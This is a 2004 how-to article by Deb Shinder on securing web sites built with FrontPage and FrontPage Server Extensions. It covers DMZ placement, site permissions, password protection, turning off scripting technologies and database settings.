Web Server Security Issues and Front Page Server Extensions

by [Published on 14 Dec. 2004 / Last Updated on 14 Dec. 2004]

It's "common knowledge" (at least in some circles) that FrontPage Server Extensions are insecure and Web Sites created with FrontPage are vulnerable -- but is it true? What are the risks associated with FrontPage and what can you do about them? What are the recommended best practices for securing FP Web sites? In this article, we'll look at Web security from the FrontPage perspective.

Regardless of the software you’re using, Web servers are vulnerable because they’re generally “out there” on the public Internet. This opens up the computer that hosts the Web server software to access from those outside the organization. For this reason, it’s especially important to protect your public Web servers and isolate them from other systems on your internal network – for example, by placing them in a DMZ or perimeter network (also sometimes called a screened subnet) with both front and back end firewalls to protect the DMZ from the Internet and to protect the internal LAN from the DMZ.

The FrontPage Server Extensions

FrontPage Server Extensions (FPSE) can run on both UNIX-based and Windows (IIS) Web servers, and the security issues differ somewhat depending on the underlying operating system and Web server software. The purpose of FPSE is to allow Web masters to create Web pages and manage Web sites through the FrontPage interface, which is more user friendly than uploading, removing and changing Web files via File Transfer Protocol (FTP). Microsoft calls a Web server running FPSE an extended Web server.

The latest version of FrontPage is 2003, but the latest version of FPSE is 2002. FP 2003 works with the 2002 server extensions, which are included with Windows Server 2003. Windows SharePoint Services also provides functionality of FPSE. You can download FPSE 2002 for Windows at http://www.microsoft.com/downloads/details.aspx?FamilyID=5cc0a845-1884-4a16-a8cb-25d2f0815fa3&displaylang=en. They can be installed on Windows NT 4.0 (with SP 6a), Windows 2000 and Windows XP with IIS.

You can download FPSE 2002 for UNIX at http://www.microsoft.com/downloads/details.aspx?FamilyID=0c5eb0ad-e1ad-4100-9b76-8772a8220062&displaylang=en. They will run on Solaris, HP/UX, Linux (Red Hat), Free BSD and other versions of UNIX.

FPSE 2002 is required for the following:

  • to upload files to the Web site via FrontPage
  • to create custom link bars, use shared border background properties and other FrontPage components
  • to get usage analysis reports
  • to take advantage of user roles for security

Some versions of FPSE are required to create hit counters, server-side image maps, search forms and other components that you insert with FrontPage.

What are the Security Issues?

It is important that only authorized users be able to add, change or delete Web content. Some components, such as Java applets and scripts, can present security risks.

Another security risk occurs when Web users connect to a database to access information.

In the following section, we’ll discuss what you can do to protect your FrontPage Web sites from these risks.

Protecting FrontPage Web Sites

There are a number of steps you can take to protect your FrontPage Web sites.

You can restrict access to the Web sites you create with FrontPage by configuring permissions. There are three levels of access to a site: end-users (browsers), those who can create content (authors) and those who can manage the site (administrators). You can set individual permissions for different sites and you can set different permissions for subsites within a site (by default, subsites inherit the permissions of their parent sites).

To set permissions for a subsite from within FrontPage 2003, do the following after opening the subsite:

  1. Click Tools | Server | Permissions
  2. On the Settings tab, select Use unique permissions for this Web site.
  3. Click Apply.
  4. Click the Groups, Users or Computers tab to set access rights for a group, user or computer. In the appropriate tab, click the Add button to add a new group, user or computer, or click the Edit button to change the access rights for a group, user or computer that is already listed.

To set permissions for a particular machine, you’ll need to enter its IP address. You can also set permissions for a group of machines within an address range by using the wildcard (*). For example, 162.198.1.*. For the group(s), user(s) or computer(s), you can select to allow browsing of the Web, authoring and browsing, or administering, authoring and browsing.

Note:
Permissions are cumulative. A group, user or computer with administrative rights can also author and browse; one with author rights can also browse.

You can also restrict access to Web pages by password protecting them. For information on how to use Active Server Pages (ASP) and an Access password database to password protect FrontPage 2003 Web sites, see KB article 825498 at http://support.microsoft.com/default.aspx?scid=kb;en-us;825498.

If you have a Web site on a UNIX server, you can use the Registration Form Handler to create registration forms and configure user permissions. For more information on how to use this feature to create a registration Web, see KB article 143092 at http://support.microsoft.com/kb/q143092/.

Note:
Registration Web pages are not supported by IIS.

A site author can turn off support for Active Server Pages (ASP) or for features that require FPSE from within FrontPage. This is done via Tools | Page Options. On the Authoring tab, you can check or uncheck the technologies that you want the site to support, including:

  • SharePoint Services
  • Browse-time Web components
  • Author-time Web components
  • ActiveX controls
  • VBScript
  • JavaScript/Jscript
  • Java applets
  • Frames
  • ASP
  • Cascading Style Sheets (CSS)
  • PGN graphics

FrontPage 2003 includes the Database Interface and Results wizards that allow you to configure options to decrease the risk when users connect to a database through the Web server. Defaults are also set for better security; for example, by default database error information is not displayed because it can be used by attackers to gain more information about the database. Another measure is to set up a special account for accessing the Web page that connects to the database, and password protecting it with a user name and password that are different from those that are used for other resources. If the database contains built-in macros, you should disable them. You also should not allow HTML content to be displayed in database columns.

Summary

FrontPage and FrontPage Server Extensions contain a number of features that allow you to make your Web sites more secure. The trick is in knowing about them and using them. In this article, we’ve discussed some of the ways you can better secure your Web sites created with FrontPage that use the FrontPage Server Extensions.

See Also


The Author — Deb Shinder

Deb Shinder avatar

Debra Littlejohn Shinder, MCSE, MVP (Security) is a technology consultant, trainer and writer who has authored a number of books on computer operating systems, networking, and security.